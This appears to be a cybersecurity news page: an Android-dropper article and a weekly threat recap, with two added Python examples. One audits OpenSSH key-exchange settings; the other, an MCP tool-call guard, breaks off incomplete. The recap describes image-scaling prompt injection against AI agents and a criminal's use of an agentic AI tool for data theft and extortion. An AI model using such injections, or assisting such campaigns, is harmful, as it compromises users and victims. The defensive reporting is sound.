2025-09-02 AI Startup News
Android Droppers Now Deliver SMS Stealers and Spyware, Not Just Banking Trojans
Cybersecurity researchers are calling attention to a new shift in the Android malware landscape where dropper apps, which are typically used to deliver banking trojans, are also being used to distribute simpler malware such as SMS stealers and basic spyware. These campaigns are propagated via dropper apps masquerading as government or banking apps in India and other parts of Asia, ThreatFabric said in a report last week. The Dutch mobile security firm said the change is driven by recent security protections that Google has piloted in select markets like Singapore, Thailand, Brazil, and India to block sideloading of potentially suspicious apps requesting dangerous permissions like SMS messages and accessibility services, a heavily abused setting to carry out malicious actions on Android devices. “Google Play Protect’s defences, particularly the targeted Pilot Program, are increasingly effective at stopping risky apps before they run,” the company said.
“Second, actors want to future-proof their operations.” “By encapsulating even basic payloads inside a dropper, they gain a protective shell that can evade today’s checks while staying flexible enough to swap payloads and pivot campaigns tomorrow.” ThreatFabric said that while Google’s strategy ups the ante by blocking a malicious app from being installed even before a user can interact with it, attackers are trying out new ways to get around the safeguards – an indication of the endless game of whack-a-mole when it comes to security. This includes designing droppers, keeping in mind Google’s Pilot Program, so that they don’t seek high-risk permissions and serve only a harmless “update” screen that can fly past scanning in the regions. But it’s only when the user clicks the “Update” button that the actual payload gets fetched from an external server or unpacked, which then proceeds to seek the necessary permissions to fulfil its objectives. “Play Protect may display alerts about the risks, as a part of a different scan, but as long as the user accepts them, the app is installed, and the payload is delivered,” ThreatFabric said.
“This illustrates a critical gap: Play Protect still allows risky apps through if the user clicks Install anyway, and the malware still slips through the Pilot Program.” One such dropper is RewardDropMiner, which has been found to serve along with spyware payloads a Monero cryptocurrency miner that can be activated remotely. Recent variants of the tool, however, no longer include the miner functionality. Some of the malicious apps delivered via RewardDropMiner, all targeting users in India, are listed below:

- PM YOJANA 2025 (com.fluvdp.hrzmkgi)
- RTO Challan (com.epr.fnroyex)
- SBI Online (com.qmwownic.eqmff)
- Axis Card (com.tolqppj.yqmrlytfzrxa)

Other dropper variants that avoid triggering Play Protect or the Pilot Program include SecuriDropper, Zombinder, BrokewellDropper, HiddenCatDropper, and TiramisuDropper. When reached for comment, Google told The Hacker News it has not found any apps using these techniques distributed via the Play Store and that it’s constantly adding new protections.
“Regardless of where an app comes from – even if it’s installed by a ‘dropper’ app – Google Play Protect helps to keep users safe by automatically checking it for threats,” a spokesperson said. “Protection against these identified malware versions was already in place through Google Play Protect prior to this report. Based on our current detection, no apps containing these versions of this malware have been found on Google Play. We’re constantly enhancing our protections to help keep users safe from bad actors.” The development comes as Bitdefender Labs has warned of a new campaign that’s using malicious ads on Facebook to peddle a free premium version of the TradingView app for Android to ultimately deploy an improved version of the Brokewell banking trojan to monitor, control, and steal sensitive information from the victim’s device.
No less than 75 malicious ads have been run since July 22, 2025, reaching tens of thousands of users in the European Union alone. The Android attack wave is just one part of a larger malvertising operation that has abused Facebook Ads to also target Windows desktops under the guise of various financial and cryptocurrency apps. “This campaign shows how cybercriminals are fine-tuning their tactics to keep up with user behavior,” the Romanian cybersecurity company said. “By targeting mobile users and disguising malware as trusted trading tools, attackers hope to cash in on the growing reliance on crypto apps and financial platforms.”
⚡ Weekly Recap: WhatsApp 0-Day, Docker Bug, Salesforce Breach, Fake CAPTCHAs, Spyware App & More
Cybersecurity today is less about single attacks and more about chains of small weaknesses that connect into big risks. One overlooked update, one misused account, or one hidden tool in the wrong hands can be enough to open the door. The news this week shows how attackers are mixing methods—combining stolen access, unpatched software, and clever tricks to move from small entry points to large consequences. For defenders, the lesson is clear: the real danger often comes not from one major flaw, but from how different small flaws interact together.
⚡ Threat of the Week
WhatsApp Patches Actively Exploited Flaw — WhatsApp addressed a security vulnerability in its messaging apps for Apple iOS and macOS that it said may have been exploited in the wild in conjunction with a recently disclosed Apple flaw in targeted zero-day attacks. The vulnerability, CVE-2025-55177, relates to a case of insufficient authorization of linked device synchronization messages. The Meta-owned company said the issue “could have allowed an unrelated user to trigger processing of content from an arbitrary URL on a target’s device.” It also assessed that the shortcoming may have been chained with CVE-2025-43300, a vulnerability affecting iOS, iPadOS, and macOS, as part of a sophisticated attack against specific targeted users. WhatsApp said it sent in-app threat notifications to less than 200 users who may have been targeted as part of the spyware campaign.
🔔 Top News
U.S. Treasury Continues to Hit IT Worker Scheme with Sanctions — The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned a fraudulent IT worker network linked to the Democratic People’s Republic of Korea (DPRK).
This included Vitaliy Sergeyevich Andreyev, a Russian national who facilitated payments to Chinyong Information Technology Cooperation Company (Chinyong), also known as Jinyong IT Cooperation Company, which was sanctioned by OFAC and South Korea’s Ministry of Foreign Affairs (MOFA) in May 2023. Also included in the designation were Kim Ung Sun, Shenyang Geumpungri Network Technology Co., Ltd., and Korea Sinjin Trading Corporation. These actors were designated for their involvement in schemes that funnel DPRK IT worker-derived revenue to support DPRK weapons of mass destruction and ballistic missile programs. The cryptocurrency wallet linked to Andreyev has “received over $600,000 of payments and has source exposure back to the Atomic Wallet exploit of June 2023,” which was attributed to the Lazarus Group, per Elliptic.
The designation builds upon other actions OFAC has taken to disrupt the DPRK’s IT worker schemes. Critical Docker Flaw Patched — Users of Docker Desktop on Windows and Mac are urged to upgrade to the latest version to patch a critical vulnerability that could allow an attacker to break the container isolation layer and potentially take over the host system. The vulnerability (CVE-2025-9074) stems from the fact that Docker Desktop exposes the Docker Engine API, which can be used to control Docker containers over a TCP socket without any authentication. As a result of this flaw, an attacker who gains access to a Docker container could leverage the API to create a new Docker container and mount the operating system’s file system, gaining access to sensitive information or overwriting system-critical files, resulting in arbitrary code execution.
However, mounting the file system as an administrator works only on Windows, as attempting this process on macOS would prompt the user for permission. Also, on macOS, Docker doesn’t run with administrator privileges like it does on Windows. Critical Sectors Targeted by MixShell — Cybercriminals have targeted dozens of critical U.S. manufacturers and supply-chain companies, looking to steal sensitive data and deploy ransomware.
The activity, dubbed ZipLine, dates back to the beginning of May 2025. Instead of emailing a malicious link in an unsolicited email, the miscreants initiate contact through the organization’s public “Contact Us” form under the guise of partnership inquiries or other business pretexts, tricking the victim into starting the conversation and allowing the attackers to bypass email filters. The attacks led to the deployment of a stealthy implant called MixShell. By using website contact forms, the attack flips the phishing playbook by getting victims to make the first email contact with the attacker rather than the other way around.
Salesforce Instances Targeted via Salesloft Drift — A threat activity cluster has committed a spate of data breaches of organizations’ Salesforce instances by compromising OAuth tokens associated with the Salesloft Drift third-party application. UNC6395 has been carrying out a “widespread data theft” campaign by targeting Salesforce instances beginning as early as August 8 through at least August 18. UNC6395 “systematically exported large volumes of data from numerous corporate Salesforce instances” for the purpose of harvesting sensitive credentials, such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. Once these credentials were exfiltrated, “the actor then searched through the data to look for secrets that could be potentially used to compromise victim environments,” and then covered its tracks by deleting query jobs.
Storm-0501 Linked to Cloud Extortion Attacks — Storm-0501 has sharpened its ransomware tactics by exploiting hijacked privileged accounts to move seamlessly between on-premises and cloud environments, exploiting visibility gaps to encrypt data and exfiltrate sensitive data, and carry out mass deletions of cloud resources, including backups. The threat actor checked for the presence of security software, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems. The attackers also conducted reconnaissance activities to gain deep visibility into the organization’s security tooling and infrastructure. This evolution signals a technical shift and a change in impact strategy.
Instead of just encrypting files and demanding ransom for decryption, Storm-0501 exfiltrates sensitive cloud data, destroys backups, and then extorts victims by threatening permanent data loss or exposure. UNC6384 Deploys PlugX via Captive Portal Hijack — Chinese state hackers have been hijacking captive portal checks to deliver malware couched as Adobe software. The activity, attributed to Mustang Panda, appears to have targeted Southeast Asian diplomats in particular, and other unidentified entities around the globe, between approximately March and July of this year. Around two dozen victims were likely compromised, although it’s possible there were more.
The trick to Mustang Panda’s latest campaign involves hijacking captive portal checks to redirect users to a website under their control to distribute malware. It’s believed that the hackers infected edge devices in the targets’ networks, which they used to intercept the check made by the Google Chrome browser. Users who fell for the scheme ended up downloading an ostensibly innocuous binary that ultimately led to the deployment of PlugX. ShadowCaptcha Leverages ClickFix to Deliver Malware — A financially motivated campaign dubbed ShadowCaptcha is leveraging fake Google and Cloudflare CAPTCHA pages to trick victims into executing malicious commands using compromised WordPress sites as an infection vector.
The attacks lead to the deployment of information stealers and ransomware, demonstrating a versatile monetization approach. The activity primarily focuses on three revenue streams: stealing and subsequently selling data, dropping cryptocurrency miners, and infecting machines with ransomware. This multi-pronged strategy ensures a sustained revenue generation mechanism, maximising their return on investment while also maintaining persistent access.
🔥 Trending CVEs
Hackers act fast.
They attack soon after a weakness is found. One missed update, a hidden error, or a forgotten security alert can let them in. A small problem can quickly turn into big trouble like stolen data or system crashes, before you even notice. Here are this week’s serious risks.
Check them, fix them fast, and stay safe before attackers do. This week’s list includes — CVE-2025-55177 (WhatsApp), CVE-2025-34509, CVE-2025-34510, CVE-2025-34511 (Sitecore Experience Platform), CVE-2025-57819 (FreePBX), CVE-2025-26496 (Tableau Server), CVE-2025-54939 (LSQUIC QUIC), CVE-2025-9118 (Google Cloud Dataform API), CVE-2025-53118 (Securden Unified PAM), CVE-2025-9478 (Google Chrome), CVE-2025-50975 (IPFire 2.29), CVE-2025-23307 (NVIDIA NeMo Curator), CVE-2025-20241 (Cisco Nexus 3000 and 9000 Series switches), CVE-2025-20317 (Cisco Integrated Management Controller), CVE-2025-20294, CVE-2025-20295 (Cisco Unified Computing System Manager), CVE-2025-54370 (PhpSpreadsheet), CVE-2025-39245, CVE-2025-39246, CVE-2025-39247 (Hikvision HikCentral), CVE-2025-49146, CVE-2025-48976, CVE-2025-53506, CVE-2025-52520 (Atlassian), CVE-2025-50979 (NodeBB), and CVE-2025-8067 (Linux UDisks daemon).
📰 Around the Cyber World
Microsoft RDP services Targeted by Malicious Scans — Microsoft’s Remote Desktop Protocol (RDP) services have been hit with a torrent of malicious scans from tens of thousands of IP addresses in recent days, indicating a coordinated reconnaissance campaign. “The wave’s aim was clear: test for timing flaws that reveal valid usernames, laying the groundwork for credential-based intrusions,” GreyNoise said.
The activity took place over two waves on August 21 and 24, with thousands of unique IP addresses simultaneously probing both Microsoft RD Web Access and Microsoft RDP Web Client authentication portals. Flaw in TheTruthSpy Spyware — A vulnerability in TheTruthSpy spyware app can allow bad actors to take over any account and retrieve collected victim data. The vulnerability exploits an issue with the app’s password recovery process to change the password of any account. TheTruthSpy told TechCrunch it can’t fix the bug because it “lost” the app’s source code.
Russia’s Max App Logs User Activity — The Russian government’s WhatsApp rival, Max, is constantly monitoring and logging all user activity. According to Corellium’s technical analysis, the app doesn’t use encryption and tracks user location in real-time and with high accuracy. Developed by Russian tech giant VK, the app has been made mandatory and must be installed on all mobile devices sold in Russia after September 1, 2025. The app was initially launched earlier this March.
OpenSSH’s PQC Play — OpenSSH said it will start showing warnings when users connect to an SSH server that does not have post-quantum cryptography protections starting with OpenSSH 10.1. “The ideal solution is to update the server to use an SSH implementation that supports at least one of these,” the maintainers said. “OpenSSH versions 9.0 and greater support sntrup761x25519-sha512 and versions 9.9 and greater support mlkem768x25519-sha256. If your server is already running one of these versions, then check whether the KexAlgorithms option has disabled their use.” Credential Harvesting Campaign Targets ScreenConnect Super Admin Accounts — A low-volume campaign is targeting ScreenConnect cloud administrators with fake email alerts warning about a potentially suspicious login event with the goal of stealing their credentials for potential ransomware deployment.
The activity, ongoing since 2022, has been attributed by Mimecast to MCTO3030. “The campaign employs spear phishing emails delivered through Amazon Simple Email Service (SES) accounts, targeting senior IT professionals, including directors, managers, and security personnel with elevated privileges in ScreenConnect environments,” the company said. “The attackers specifically seek super administrator credentials, which provide comprehensive control over remote access infrastructure across entire organizations.” The attackers are using the open source Evilginx framework to provision these phishing pages and to act as a reverse proxy between the victim and the real site. The framework can capture both login credentials and session cookies.
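For the OpenSSH item above, the maintainers' advice is to check whether the `KexAlgorithms` option has disabled the post-quantum key exchanges. The following is an added example, not code from the article or from the OpenSSH project: it audits the text of an `sshd_config` offline and reports whether `sntrup761x25519-sha512` or `mlkem768x25519-sha256` survive the directive. The function names and the shortened default list are assumptions made for illustration; on a live host the effective list comes from `sshd -T`.

```python
"""Audit an sshd_config for post-quantum key exchange (added example)."""
import fnmatch

# Post-quantum KEX names quoted in the OpenSSH item above.
PQ_KEX = ("sntrup761x25519-sha512", "mlkem768x25519-sha256")

# Constructed, shortened default list (assumption). Replace it with the
# defaults of the OpenSSH version you are auditing.
SAMPLE_DEFAULTS = [
    "mlkem768x25519-sha256",
    "sntrup761x25519-sha512",
    "sntrup761x25519-sha512@openssh.com",
    "curve25519-sha256",
    "curve25519-sha256@libssh.org",
    "ecdh-sha2-nistp256",
    "diffie-hellman-group14-sha256",
]


def first_kex_directive(config_text):
    """Return the value of the first global KexAlgorithms line, or None."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        # Keyword and value are separated by whitespace or a single '='.
        parts = line.replace("=", " ", 1).split(None, 1)
        if not parts:
            continue
        keyword = parts[0].lower()               # keywords are case-insensitive
        if keyword == "match":
            break                                # only the global section is read
        if keyword == "kexalgorithms" and len(parts) == 2:
            return parts[1].split()[0].strip('"')  # first value obtained wins
    return None


def effective_kex(value, defaults):
    """Apply a KexAlgorithms value (with +, - or ^ prefix) to the defaults."""
    if not value:
        return list(defaults)
    prefix = value[0]
    names = [n for n in value.lstrip("+-^").split(",") if n]
    if prefix == "+":                            # append to the default set
        return list(defaults) + [n for n in names if n not in defaults]
    if prefix == "-":                            # remove, wildcards allowed
        return [d for d in defaults
                if not any(fnmatch.fnmatchcase(d, pat) for pat in names)]
    if prefix == "^":                            # move to the head of the set
        return names + [d for d in defaults if d not in names]
    return names                                 # explicit list replaces defaults


def pq_status(config_text, defaults=SAMPLE_DEFAULTS):
    """Report which post-quantum KEX algorithms remain enabled."""
    effective = effective_kex(first_kex_directive(config_text), defaults)
    enabled = [k for k in effective if k.split("@", 1)[0] in PQ_KEX]
    return {
        "effective": effective,
        "pq_enabled": enabled,
        "pq_preferred": bool(effective) and effective[0] in enabled,
    }


# Constructed sample configurations, not taken from any real host.
SAMPLES = {
    "defaults": "Port 22\n#KexAlgorithms curve25519-sha256\n",
    "classical-only": "KexAlgorithms curve25519-sha256,ecdh-sha2-nistp256\n",
    "pq-removed": "KexAlgorithms -sntrup761*,mlkem768*\n",
    "legacy-added": "KexAlgorithms +diffie-hellman-group1-sha1\n",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        status = pq_status(text)
        verdict = "ok" if status["pq_enabled"] else "NO post-quantum KEX"
        print(f"{name:15} {verdict:20} {','.join(status['pq_enabled'])}")
```

An explicit list or a `-` pattern is what silently removes the post-quantum exchanges; a `+` entry leaves them in place.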
More ScreenConnect-Themed Campaigns Discovered — Another campaign has leveraged phishing emails with fake Zoom meeting invitations and Microsoft Teams calls to lead victims to malicious links that download the ScreenConnect software. “The weaponization of a legitimate IT administration tool – one designed to grant IT professionals deep system access for troubleshooting and maintenance – combined with social engineering and convincing business impersonation creates a multi-layered deception that provides attackers with the dual advantage of trust exploitation and security evasion,” Abnormal AI said. The campaign has so far targeted more than 900 organizations, impacting a broad range of sectors and geographies. A separate campaign has also been observed using fake AI-themed content to lure users into executing a malicious, pre-configured ScreenConnect installer, which then acts as an entry point for the XWorm malware, per Trustwave.
In a related development, attackers have been observed weaponizing Cisco’s secure links (“secure-web.cisco[.]com”) in credential phishing campaigns to evade link scanning and bypass network filters. “Attackers compromise or create accounts within Cisco-protected organizations,” Raven AI said. “They simply email themselves malicious links, let Cisco’s system rewrite them into Safe Links, then harvest these URLs for their campaigns.” A similar campaign exploiting Proofpoint links was disclosed by Cloudflare in July 2025. TRM Labs Warns of Scam Campaign Impersonating the Firm — The blockchain intelligence company said it’s aware of individuals using false domains to impersonate TRM Labs and/or government agencies working in collaboration with TRM Labs.
“These are not TRM Labs domains, and the actors behind these are scammers,” the company said. “TRM Labs is not involved in fund recovery processes for victims and does not partner with government agencies for the purposes of fund recovery. Unfortunately, these types of scams deliberately target vulnerable people, often when they’re financially vulnerable, having potentially already lost funds to scams.” The warning comes against the backdrop of an alert issued by the U.S. Federal Bureau of Investigation (FBI), urging cryptocurrency scam victims to be on the lookout for scams where fraudsters pose as lawyers representing fictitious law firms offering to assist them with fund recovery, only to deceive them a second time.
New Ransomware Strains Detected — A new ransomware strain going by the name of Cephalus has been spotted in the wild. In incidents observed around mid-August 2025, the group behind the locker used compromised RDP accounts for initial access and used the cloud storage service MEGA for likely data exfiltration purposes. The development comes as the Underground and NightSpire ransomware gangs have launched ransomware attacks against companies in various countries and industries, including South Korea. In another attack analyzed by eSentire, compromised third-party MSP SonicWall SSL VPN credentials served as an initial access pathway for Sinobi, a rebrand of the Lynx ransomware.
“Using the compromised account, the threat actors executed commands to create a new local administrator account, set its password, and add it to the domain administrators group,” eSentire said. “Both the initial compromised account and the newly created account were subsequently used for lateral movement throughout the network.” Most Active Ransomware Groups — Akira, Cl0p, Qilin, Safepay, and RansomHub were the most active ransomware groups in the first half of 2025, per Flashpoint, which found that ransomware attacks increased by 179% compared to the 2024 midyear. The development comes amid notable changes in the ransomware ecosystem, where threat actors increasingly prefer extortion over encryption and have begun to incorporate LLMs in their tooling. The landscape has also continued to splinter, with new gangs and rebrands proliferating in the wake of law enforcement takedowns.
MalwareBytes said it tracked 41 newcomers between July 2024 and June 2025, with more than 60 total ransomware gangs operating at once. Microsoft to Throttle Emails to Combat Spam — Microsoft said it will begin throttling emails starting October 15, 2025. The limit will be set to 100 external recipients per organization per 24-hour rolling window. From December 1, the tech giant will start rolling out the restrictions across tenants, starting with tenants with fewer than three seats and eventually reaching tenants with more than 10,001 seats by June 2026.
“Despite our efforts to minimize abuse, spammers often exploit newly created tenants to send bursts of spam from ‘.onmicrosoft.com’ addresses before we can intervene,” Microsoft said. “This degrades this shared domain’s reputation, affecting all legitimate users. To ensure brand trust and email deliverability, organizations should establish and use their own custom domains for sending email.” SleepWalk, a Physical Side-Channel Attack to Leak Data — A group of academics from the University of Florida has devised a new hardware side-channel attack dubbed SleepWalk that exploits context switching and CPU power consumption to leak sensitive data like cryptographic keys. “We introduce a physical power side-channel leakage source that exploits the power spike observed during a context switch, triggered by the inbuilt sleep function of the system kernel,” the researchers said.
“We observed that this power spike directly correlates with both the power consumption during context switching and the residual power consumption of the previously executed program. Notably, the persistence of residual power signatures from previous workloads extends the scope of this side-channel beyond extracting the data in registers during the context switch. Unlike traditional approaches that require analyzing full power traces, applying complex preprocessing, or relying on external synchronization triggers, this novel technique leverages only the amplitude of a single power spike, significantly simplifying the attack.” AI Systems Vulnerable to Prompt Injection via Image Scaling Attack — In a novel form of prompt injection attacks aimed at artificial intelligence (AI) chatbots, attackers can hide malicious instructions inside large-scale images and have the prompts execute when the AI agent downscales them. The attacker’s prompt is invisible to the human eye in the high-resolution image, but shows up when the image is downscaled by preprocessing algorithms.
“This attack works because AI systems often scale down large images before sending them to the model: when scaled, these images can reveal prompt injections that are not visible at full resolution,” Trail of Bits said. The cybersecurity company has released an open-source tool called Anamorpher to generate such crafted images. Social Media Accounts Launder News from Chinese State Media Sites — A network of 11 domains and 16 companion social media accounts across Facebook, Instagram, Mastodon, Threads, and X has been found laundering exclusively English-language articles originally published by the Chinese state media outlet CGTN. “The assets almost certainly used AI tools to translate and summarize articles from CGTN, likely in an attempt to disguise the content’s origin,” Graphika said.
“The network assets disseminated primarily pro-China, anti-West content in English, French, Spanish, and Vietnamese.” The findings came as the U.S. told Denmark to “calm down” over allegations of covert influence operations by U.S. citizens in Greenland to sow discord between Denmark and Greenland and to promote Greenland’s secession from Denmark to the U.S. Analyzing Secret Families of VPN Apps — New research conducted by the Arizona State University and Citizen Lab has found that nearly two dozen VPN applications in Google Play contain security weaknesses impacting the privacy of their users, exposing transmitted data to decryption risks.
Further analysis has determined that eight VPN applications from Innovative Connecting, Autumn Breeze, and Lemon Clove (Turbo VPN, Turbo VPN Lite, VPN Monster, VPN Proxy Master, VPN Proxy Master – Lite, Snap VPN, Robot VPN, and SuperNet VPN) share code, dependencies, outdated and unsafe encryption methods, and hard-coded passwords, potentially allowing attackers to decrypt the traffic of their users. Cumulatively, these apps have over 380 million downloads on Google Play. All three companies were found to have ties with Qihoo 360, a Chinese cybersecurity firm that the U.S. sanctioned in 2020.
Security Risks in the eSIM Ecosystem — A new study undertaken by academics from Northeastern University has found that many providers associated with eSIMs route user data through foreign telecommunications networks, including Chinese infrastructure, regardless of user location. “Many travel eSIMs route user traffic through third-party infrastructure, often located in foreign jurisdictions,” the researchers said. “This may expose user metadata and content to networks outside the user’s country, raising concerns about jurisdictional control and surveillance.” What’s more, the digital provisioning model creates new opportunities for phishing and spoofing. Malicious actors can distribute fake eSIM profiles via fraudulent QR codes or websites, tricking users into installing unauthorized configurations.
ComfyUI Flaw Exploited to Deliver Pickai Backdoor — Threat actors have exploited vulnerabilities in an artificial intelligence (AI) platform called ComfyUI to deliver a backdoor called Pickai. “Pickai is a lightweight backdoor written in C++, designed to support remote command execution and reverse shell access,” XLab said, adding that it “includes anti-debugging, process name spoofing, and multiple persistence mechanisms.” Pickai samples have been observed hosted on the official site of Rubick.ai, a commercial AI-powered platform serving the e-commerce sector across the U.S., India, Singapore, and the Middle East. Early versions of the malware were uploaded to VirusTotal as far back as February 28, 2025. The activity has compromised nearly 700 infected servers worldwide, mainly in Germany, the U.S., and China.
Flaw in LSQUIC QUIC Disclosed — Cybersecurity researchers have discovered a vulnerability dubbed QUIC-LEAK (CVE-2025-54939) in the LSQUIC QUIC implementation, allowing threat actors to smuggle malformed packets to exhaust memory and crash QUIC servers even before a connection handshake is established, thereby bypassing QUIC connection-level safeguards. The issue has been fixed in OpenLiteSpeed 1.8.4 and LiteSpeed Web Server 6.3.4. Fake Sites Pushing YouTube Downloads Serve Proxyware — Proxyware programs are being distributed through YouTube sites that allow users to download videos. Attackers who previously installed DigitalPulse and HoneyGain Proxywares are also installing Infatica Proxyware.
Similar to coin miners, Proxyware malware profits by utilizing the system’s resources, and many systems in South Korea have recently become the targets of these attacks. U.S. Senator Castigates Federal Judiciary for Negligence — U.S. Senator Ron Wyden accused the federal judiciary of “negligence and incompetence” following a recent hack, reportedly by hackers with ties to the Russian government, that exposed confidential court documents.
The breach of the judiciary’s electronic case filing system first came to light in a report by Politico three weeks ago, which went on to say that the vulnerabilities exploited in the hack were known since 2020. The New York Times, citing people familiar with the intrusion, said that Russia was “at least partly responsible” for the hack. “The federal judiciary’s current approach to information technology is a severe threat to our national security,” Wyden wrote. “The courts have been entrusted with some of our nation’s most confidential and sensitive information, including national security documents that could reveal sources and methods to our adversaries, and sealed criminal charging and investigative documents that could enable suspects to flee from justice or target witnesses.” Law Enforcement Freezes $50M in Crypto Assets Tied to Romance Baiting Scams — Several cryptocurrency companies, including Chainalysis, OKX, Binance, and Tether, have come together to freeze nearly $50 million stolen via “romance baiting” scams in collaboration with APAC-based authorities.
“Once funds were transferred, scammers then sent proceeds to a consolidation wallet which transferred $46.9 million in USDT [Tether] to a collection of three intermediary addresses,” Chainalysis said. “The funds then moved to five different wallets.” The funds were frozen by Tether in July 2024. South Korea Extradites Chinese National for Cyber Attacks — South Korean authorities have successfully extradited a 34-year-old Chinese national suspected of orchestrating one of the most sophisticated hacking operations targeting high-profile individuals and financial institutions. He is alleged to have stolen 38 billion won from financial accounts and virtual asset accounts.
Anthropic and OpenAI Test Each Other’s AI — OpenAI has called on AI firms to test their rivals’ systems for safety, as the company and Anthropic conducted safety evaluations of each other’s AI systems to tackle risks like prompt injection and model poisoning. The development came as Anthropic revealed that a cybercriminal abused its agentic AI coding tool to automate a large-scale data theft and extortion campaign, marking a “new evolution” in how AI is super-charging cybercrime. The chatbot then analyzed the companies’ hacked financial documents to help arrive at a realistic amount of bitcoin to demand in exchange for not leaking the stolen material. It also wrote suggested extortion emails.
“The operation demonstrates a concerning evolution in AI-assisted cybercrime, where AI serves as both a technical consultant and active operator, enabling attacks that would be more difficult and time-consuming for individual actors to execute manually.” Where years of specialized training once throttled the ability of bad actors to pull off attacks at scale, the new wave of AI-assisted cybercrime could further lower technical barriers, allowing even novices and unskilled operators to carry out complex activities with ease. Separately, Anthropic has announced a policy change to train its AI chatbot Claude with user data, giving existing users until September 28, 2025, to either opt in or opt out to continue using the service; it says it will enable the company to deliver “even more capable, useful AI models” and strengthen safeguards against harmful usage like scams and abuse. Plex Servers Susceptible to New Flaw — Plex has addressed a security vulnerability (CVE-2025-34158), stemming from incorrect resource transfer between spheres, affecting Plex Media Server versions 1.41.7.x to 1.42.0.x. It has been patched in versions 1.42.1.10060 or later.
According to data from Censys, there are 428,083 devices exposing the Plex Media Server web interface, although not all of them are necessarily vulnerable.
Fake Recipe and Guide Sites Drop Malware — Bogus sites masquerading as image, recipe, and educational guide finders have been found to harbor stealthy code to issue stealthy commands and drop malware on users’ systems that can steal sensitive information. It’s assessed that these sites reach targets via malvertising campaigns.
🎥 Cybersecurity Webinars
- What Every AppSec Leader Must Learn About Code-to-Cloud Security - Modern AppSec is no longer just about spotting risks—it’s about learning how they emerge and spread from code to cloud. Without visibility across that journey, teams face blind spots, noise, and delayed fixes. Code-to-cloud context changes the game, giving security and engineering teams the clarity to learn faster, act sooner, and protect what matters most.
- Practical Steps to Keep AI Agents Safe from Cyberattacks - AI agents are rapidly reshaping business—automating decisions, streamlining operations, and unlocking new opportunities. But with innovation comes risk. Join our upcoming webinar with Auth0’s Michelle Agroskin to uncover the security challenges AI agents introduce and learn actionable strategies to protect your organization. Discover how to stay ahead of threats while confidently embracing the future of AI-driven innovation.
- From Fingerprints to Code Traces: How Experts Hunt Down Shadow AI - AI Agents are multiplying in your workflows, clouds, and business processes—often without approval. These “shadow agents” move faster than governance, fueled by hidden identities and one-click deployments. The result? Security teams are left chasing ghosts. Join our expert panel to uncover where shadow AI hides, who’s behind it, and how to take back control—without slowing down innovation.
🔧 Cybersecurity Tools
- PcapXray - Investigating packet captures can be slow and messy. PcapXray speeds up the process by turning raw PCAP files into clear, visual network diagrams. It highlights hosts, traffic flows, Tor usage, and potential malicious activity—helping investigators and analysts quickly see what’s happening inside the data without digging line by line.
- Kopia - It is an open-source backup and restore tool that creates encrypted snapshots of selected files and directories. Instead of imaging an entire machine, it lets you back up what matters most—whether to local storage, network drives, or cloud providers like S3, Azure, or Google Cloud. With built-in deduplication, compression, and end-to-end encryption, Kopia helps ensure backups are efficient, secure, and under your full control.
Disclaimer: These newly released tools are for educational use only and haven’t been fully audited. Use at your own risk—review the code, test safely, and apply proper safeguards.
🔒 Tip of the Week
How to Lock Down Your MCP Servers — AI tools like GitHub Copilot are getting smarter every day.
With the Model Context Protocol (MCP), they can connect to outside tools and services—running code, pulling data, or even talking to internal systems. That’s powerful, but it’s also risky: if a bad actor sneaks in with a fake or compromised MCP server, your AI could be tricked into leaking secrets, exposing credentials, or executing harmful commands. The solution isn’t to avoid MCP. It’s to secure it properly. Here’s a practical way to do that using free tools.
1. Test Before You Trust: Before turning on any MCP server, run an audit. Tool to try: MCPSafetyScanner. What it does: Scans MCP definitions, runs test attacks, and reports if something looks unsafe.
2. Wrap Servers with a Safety Net: Don’t expose servers directly. Add a guard layer. Tool to try: MCP Guardian (open-source prototype from research). What it does: Adds authentication, logs all activity, and blocks suspicious requests.
3. Stress-Test Like an Attacker: Simulate real-world threats to see how your setup holds up. Tool to try: MCPSecBench. What it does: Launches different known MCP attack patterns and measures resilience.
4. Enforce Rules as Code: Add guardrails for what AI can and can’t do. Tools to try: Open Policy Agent (OPA) or Kyverno. What they do: Define policies (e.g., “only read from X API, never write”) and enforce them automatically.
5. Go Zero-Trust on Access: Every connection should be verified and limited. Use OAuth 2.1 for authorization. Add mTLS (mutual TLS) so both client and server prove who they are. Send all logs to your SIEM (e.g., Elastic or Grafana Loki) for monitoring.
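The guard layer of step 2 and the "rules as code" idea of step 4 can be combined in a deny-by-default check applied to each MCP `tools/call` request before it is forwarded, with one log line per decision for the SIEM mentioned in step 5. This is an added example, not code from MCP Guardian, OPA, or the original article. The client name, tool names, policy layout, and the `evaluate` and `tool_call` helpers are assumptions made for illustration.

```python
"""Deny-by-default policy check for MCP tool calls (added example, not MCP Guardian code)."""
import json
import logging
import posixpath
from dataclasses import dataclass

log = logging.getLogger("mcp_guard")

# Assumed policy: per client, the tools it may call and optional argument limits.
# Client and tool names are hypothetical. Write-capable tools are simply not listed,
# which implements "only read, never write" without a separate deny list.
POLICY = {
    "ide-assistant": {
        "tickets.search": {},
        "tickets.get": {},
        "files.read": {"path_prefix": "/srv/docs/"},
    },
}

# Protocol methods that invoke no tool and are forwarded unchanged.
PASSTHROUGH_METHODS = {"initialize", "notifications/initialized", "ping", "tools/list"}


@dataclass(frozen=True)
class Decision:
    allow: bool
    reason: str


def _decide(client_id, method, tool, allow, reason):
    # One JSON line per decision so the log can be shipped to a SIEM.
    log.info(json.dumps({"client": client_id, "method": method, "tool": tool,
                         "allow": allow, "reason": reason}))
    return Decision(allow, reason)


def evaluate(client_id: str, raw_message: str) -> Decision:
    """Decide whether one JSON-RPC message from an MCP client may reach the server."""
    try:
        msg = json.loads(raw_message)
    except json.JSONDecodeError:
        return _decide(client_id, None, None, False, "malformed JSON")
    if not isinstance(msg, dict) or not isinstance(msg.get("method"), str):
        return _decide(client_id, None, None, False, "not a JSON-RPC request")

    method = msg["method"]
    if method in PASSTHROUGH_METHODS:
        return _decide(client_id, method, None, True, "passthrough method")
    if method != "tools/call":
        return _decide(client_id, method, None, False, "method not allowed")

    params = msg.get("params")
    if not isinstance(params, dict) or not isinstance(params.get("name"), str):
        return _decide(client_id, method, None, False, "missing tool name")
    tool = params["name"]
    rule = POLICY.get(client_id, {}).get(tool)
    if rule is None:
        return _decide(client_id, method, tool, False, "tool not in allowlist")

    prefix = rule.get("path_prefix")
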